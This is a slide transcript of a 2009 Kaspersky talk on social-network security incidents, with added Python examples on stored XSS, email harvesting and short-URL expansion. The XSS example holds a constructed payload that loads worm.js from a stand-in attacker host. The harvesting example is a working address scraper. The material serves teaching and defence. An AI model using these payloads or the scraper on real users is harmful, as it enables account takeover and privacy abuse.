
Today’s hidden dangers: Social networks under attack

A timeline of security incidents on social networks in 2009.


  1. Today’s hidden dangers: Social networks under attack
     Ștefan Tănase, Senior Regional Researcher, Kaspersky Lab EEMEA
     Webstock 2009 – Bucharest, Romania - 18 September 2009
  2. Social networks: 911 (overview)
     • Do you believe in superstitions? I don’t.
     • 911 - emergency phone number
     • Today: 18 September 2009, 18.09.2009, 18.09.09, 18.9.9; 1 + 8 = 9
     • Today’s presentation: 11 security incidents that changed the social networking world in 2009. 11 and 09.
  3. LinkedIn – just a starter
     • January 2009 - Bogus LinkedIn profiles serving malware
     • Massive malware campaign starts targeting LinkedIn
     • Why LinkedIn? Because it worked!
     • Blackhat SEO: by googling for “Jessica Alba naked” or “Keri Russell nude” the user would find the malicious profiles indexed in the top 5 of the SERPs
  4. Twitter spam gets automated
     • February 2009 – First commercial Twitter spamming tool
     • Tweettornado.com - “fully automated advertising software for Twitter”
     • Empowered phishers, spammers, malware authors and anyone else with the ability to generate unlimited Twitter accounts
     • Features: add an unlimited number of followers; automatically update all accounts through proxy servers with identical messages
  5. Comeback of the XSS worm
     • April 2009 – Twitter gets hit by an XSS worm
     • Multiple variants of the worm were identified
     • Thousands of spam messages containing the word “Mikeyy” filled the timeline
     • Proof of concept – no malicious intent
     • The author got a job at a web security company
  6. Comeback of the XSS worm (slide with no text content)
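The mechanism behind a profile-based XSS worm like the one on slides 5 and 6, as an added example in Python (not Twitter's code and not the Mikeyy payload): a hypothetical profile page renders two user-controlled fields, `name` and `homepage`, first by plain concatenation and then with output encoding plus a URL-scheme allow-list. The profiles, field names and payload are constructed for illustration.

```python
"""Stored XSS through a profile field: the unsafe rendering beside its hardened form.

Added example, not Twitter's code and not the Mikeyy worm. It assumes the classic
pattern behind profile-based XSS worms: user-controlled profile fields (the
hypothetical 'name' and 'homepage' fields below) are pasted into the HTML that
every visitor of the profile receives. Profiles and payload are constructed.
"""
import html
import re
from urllib.parse import urlsplit

# Constructed attacker profile: a <script> in the display name and a javascript:
# URL in the homepage field. If worm.js re-submits this same profile on behalf of
# whoever views the page, each viewer becomes a new carrier.
ATTACKER_PROFILE = {
    "name": 'mikeyy<script src="http://evil.example/worm.js"></script>',
    "homepage": 'javascript:fetch("/update_profile",{method:"POST"})',
}
BENIGN_PROFILE = {"name": "Stefan Tanase", "homepage": "https://twitter.com/stefant"}


def render_unsafe(profile):
    """Vulnerable: raw string concatenation, no output encoding."""
    return (
        f'<h1>{profile["name"]}</h1>'
        f'<a href="{profile["homepage"]}">homepage</a>'
    )


def safe_url(url):
    """Allow only absolute http(s) URLs in href; anything else becomes '#'.
    Escaping alone does not help here: 'javascript:' contains no HTML metacharacters."""
    parts = urlsplit(url.strip())
    if parts.scheme.lower() in ("http", "https") and parts.netloc:
        return url.strip()
    return "#"


def render_safe(profile):
    """Hardened: escape text for the element context, escape attribute values with
    quote=True, and allow-list the URL scheme before it reaches an href."""
    name = html.escape(profile["name"], quote=True)
    href = html.escape(safe_url(profile["homepage"]), quote=True)
    return f'<h1>{name}</h1><a href="{href}">homepage</a>'


SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
JS_HREF = re.compile(r'href="\s*javascript:', re.IGNORECASE)


def is_executable(page):
    """Crude comparison check only: does the rendered HTML still contain a live
    <script> tag or a javascript: href?"""
    return bool(SCRIPT_TAG.search(page) or JS_HREF.search(page))


if __name__ == "__main__":
    print("unsafe rendering executable:", is_executable(render_unsafe(ATTACKER_PROFILE)))  # True
    print("safe rendering executable:  ", is_executable(render_safe(ATTACKER_PROFILE)))    # False
    print(render_safe(ATTACKER_PROFILE))
```

A templating engine with auto-escaping covers what `html.escape` does here, but it does not cover the `javascript:` case: a URL that lands in an `href` needs its scheme checked separately, which is why `safe_url` exists in addition to the escaping.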
  7. Social engineering at its best
     • April 2009 – Twitter admin panel gets hacked
     • Public information posted to social networks by a Twitter admin
     • Used by a French hacker in a social engineering attack to answer the Yahoo! Mail security question and reset the password
     • “Wow - my Yahoo mail account was just hacked.”
     • “If anyone with Yahoo! Security is out there, hit me up with a reply”
  8. What are you doing? Harvesting.
     • May 2009 – Harvesting email addresses in real time
     • Why search for emails when you can get fresh ones in real time?
     • http://search.twitter.com/ is the answer!
     • Simple but effective search queries: “email me at” + “yahoo.com”; “contact me at” + “gmail.com”
     • Personalized attacks start happening
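The harvesting technique on slide 8, as an added Python example (not from the talk): the slide's search queries are run over a constructed, in-memory timeline instead of search.twitter.com so the code works offline, the matching posts are mined for addresses, and the same extractor doubles as the pre-posting check a client could run on its own user. It goes slightly beyond the slide by also catching the "user (at) host (dot) tld" disguise. The handles and addresses below are made up.

```python
"""Harvesting e-mail addresses from public posts, and the check that stops you
leaking yours.

Added example, not from the talk. The tweets are constructed; the query terms are
the ones the slide names ("email me at", "contact me at" plus a mail domain). A
real harvester would fetch the text from search.twitter.com; here search() is a
simulation over a list so everything runs offline.
"""
import re

# Constructed sample timeline (handles and addresses are made up).
SAMPLE_TWEETS = [
    ("alice", "New job hunting! email me at alice.w@yahoo.com if you have leads"),
    ("bob", "contact me at bob_the_dev@gmail.com for freelance work #php"),
    ("carol", "Great weather in Bucharest today, Webstock is on!"),
    ("dave", "you can reach me at dave (at) example (dot) org - no spam please"),
    ("erin", "email me at erin@corp.example for the slides"),
]

# Query phrases and domains, as in the slide's search.twitter.com examples.
QUERY_PHRASES = ("email me at", "contact me at", "reach me at")
QUERY_DOMAINS = ("yahoo.com", "gmail.com")

EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# The "user (at) host (dot) tld" disguise that a plain @-scanner misses.
OBFUSCATED_RE = re.compile(
    r"([A-Za-z0-9._%+-]+)\s*\(\s*at\s*\)\s*([A-Za-z0-9-]+)\s*\(\s*dot\s*\)\s*([A-Za-z]{2,})",
    re.IGNORECASE,
)


def search(tweets, phrases=QUERY_PHRASES, domains=QUERY_DOMAINS):
    """Simulated search.twitter.com query: a phrase AND a domain both present."""
    hits = []
    for user, text in tweets:
        low = text.lower()
        if any(p in low for p in phrases) and any(d in low for d in domains):
            hits.append((user, text))
    return hits


def extract_emails(text):
    """Every address in the text, lower-cased, with the (at)/(dot) form normalised."""
    found = [m.group(0).lower() for m in EMAIL_RE.finditer(text)]
    for user, host, tld in OBFUSCATED_RE.findall(text):
        found.append(f"{user}@{host}.{tld}".lower())
    return found


def harvest(tweets):
    """Attacker view: handle -> addresses for every post the query returns."""
    return {user: extract_emails(text) for user, text in search(tweets)}


def leaks_contact(draft):
    """Defender view: run on a draft before it is posted. True if the post would
    hand an address to the harvesting query above (or to a smarter one)."""
    return bool(extract_emails(draft))


if __name__ == "__main__":
    for user, addresses in harvest(SAMPLE_TWEETS).items():
        print(f"{user}: {', '.join(addresses)}")
```

Note that the domain filter is what makes the query cheap for the attacker and also what limits it: dave's obfuscated address and erin's non-webmail domain never come back from `search()`, but `extract_emails()` still finds them when run over the full stream, which is the version the defender's check should use.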
  9. Trendy malware
     • June 2009 – Trending topics start being exploited
  10. Short URLs, big problems
     • June 2009 – URL shortening service Cli.gs gets hacked
     • The best thing about short URLs: there are so many!
     • Problems with short URLs: social engineering is easy; questionable reliability; implicit trust
     • Cli.gs gets hacked, no malicious intent – but what if?
     • Too many redirects hosted in the same place is not good news
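What "implicit trust" in a short URL costs and how to avoid paying it, as an added Python example (not from the talk and not Cli.gs code): expand the link one hop at a time with redirects disabled, keep a hop limit and loop detection, and only then decide on the final target. The redirect table is a constructed stand-in for the `Location` headers real shorteners would send, so the example runs offline; `live_fetch_location` sketches how the same function would be wired to urllib, which is an assumption about deployment rather than anything the slide describes.

```python
"""Expanding a short URL before trusting it.

Added example, not from the talk and not Cli.gs code. expand() follows a redirect
chain through an injected fetch_location callable so it can be run offline against
the constructed table below; live_fetch_location() is the assumed real wiring
(one HEAD request per hop, automatic redirect following switched off).
"""
import urllib.error
import urllib.request
from urllib.parse import urlsplit

MAX_HOPS = 5
SUSPICIOUS_SUFFIXES = (".exe", ".scr", ".pif", ".zip")

# Constructed redirect table: short URL -> the Location header it would send.
FAKE_REDIRECTS = {
    "http://short.example/a1": "http://short2.example/b2",
    "http://short2.example/b2": "http://short.example/a1",   # redirect loop
    "http://short.example/c3": "http://short2.example/d4",
    "http://short2.example/d4": "http://short3.example/e5",
    "http://short3.example/e5": "http://short4.example/f6",
    "http://short4.example/f6": "http://short5.example/g7",
    "http://short5.example/g7": "http://short6.example/h8",  # chain too deep
    "http://short.example/ok": "https://www.example.com/article",
    "http://short.example/bad": "http://video-download.example/free-video.exe",
}


def fake_fetch_location(url):
    """Offline stand-in for one request with redirects disabled."""
    return FAKE_REDIRECTS.get(url)


def live_fetch_location(url, timeout=5):
    """Assumed live wiring: a single HEAD, no automatic redirect following.
    Returns the Location header of a 3xx response, or None if not a redirect."""
    class NoRedirect(urllib.request.HTTPRedirectHandler):
        def redirect_request(self, *args, **kwargs):
            return None  # refuse to follow; urllib then raises HTTPError for 3xx
    opener = urllib.request.build_opener(NoRedirect)
    try:
        opener.open(urllib.request.Request(url, method="HEAD"), timeout=timeout)
        return None
    except urllib.error.HTTPError as err:
        if err.code in (301, 302, 303, 307, 308):
            return err.headers.get("Location")
        return None


def expand(url, fetch_location=fake_fetch_location, max_hops=MAX_HOPS):
    """Return (final_url, chain, status); status is 'ok', 'loop' or 'too_many_hops'.
    chain lists every URL visited, starting with the short one."""
    chain, seen, current = [url], {url}, url
    for _ in range(max_hops):
        nxt = fetch_location(current)
        if nxt is None:            # not a redirect: this is the real destination
            return current, chain, "ok"
        chain.append(nxt)
        if nxt in seen:
            return nxt, chain, "loop"
        seen.add(nxt)
        current = nxt
    return current, chain, "too_many_hops"


def assess(url, fetch_location=fake_fetch_location):
    """Verdict before clicking: expand, then apply cheap checks on the result."""
    final, chain, status = expand(url, fetch_location)
    reasons = []
    if status != "ok":
        reasons.append(status)
    if urlsplit(final).path.lower().endswith(SUSPICIOUS_SUFFIXES):
        reasons.append("executable download")
    if len(chain) > 2:             # more than one shortener in a row
        reasons.append(f"{len(chain) - 1} redirects")
    return {"final": final, "hops": len(chain) - 1,
            "verdict": "block" if reasons else "allow", "reasons": reasons}


if __name__ == "__main__":
    for short in ("http://short.example/ok", "http://short.example/bad",
                  "http://short.example/a1", "http://short.example/c3"):
        print(short, "->", assess(short))
```

Chained shorteners are the case the slide warns about: one compromised or disappearing service in the middle takes every link through it down with it, and each extra hop is one more place for the destination to be swapped, so the number of hops itself is treated as a signal here.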
  11. Follow me! Me me me!
     • June 2009 – Guy Kawasaki's Twitter account hijacked
     • Of course, it was used to push malware – both Windows and Mac malware
     • 140,000 Twitter users were potential victims
     • The hook? “sex tape video free download”
  12. The web 2.0 worm
     • June 2009 – Explosive growth of Koobface modifications
     • The number of variants detected jumped from 324 at the end of May to almost 1000 by the end of June 2009
     • This increase in cybercriminal activity involving social networks over the past months shows that the strategies the bad guys use to infect users are much more efficient when the attacks are given a social context
  13. The web 2.0 worm (slide with no text content)
  14. Koobface on the tweet
     • June 2009 – Koobface spreading through Twitter as well
     • First discovered one year ago by Kaspersky Lab, Koobface was initially targeting only Facebook and MySpace users
     • Constantly “improved”, it now spreads through more social networks: Facebook, MySpace, Hi5, Bebo, Tagged, Netlog and most recently… Twitter
  15. One bird and two stones
     • August 2009 – Twitter knocked offline by a DDoS attack
     • The morning of August 6th - Twitter gets hit for an extended period of time
     • Rumors that they are facing a massive distributed denial-of-service attack
     • Twitter confirmed the outage in a brief status message
     • Service was restored gradually, first in the US, then in the rest of the world
     • Problems with the API lasted for several days
  16. That’s it?
  17. What’s next?
     • It is just the beginning
     • Attack techniques exploiting social networks will continue to grow
     • Social networks will open up new ways for targeted attacks against individuals
     • It will be very hard for social networks to do better: their business means usability, not security
     • Be careful out there!
  18. Thank you!
     Ștefan Tănase, Senior Regional Researcher, Kaspersky Lab EEMEA
     stefant@kaspersky.ro – twitter.com/stefant
     Webstock 2009 - Bucharest, Romania - 18 September 2009
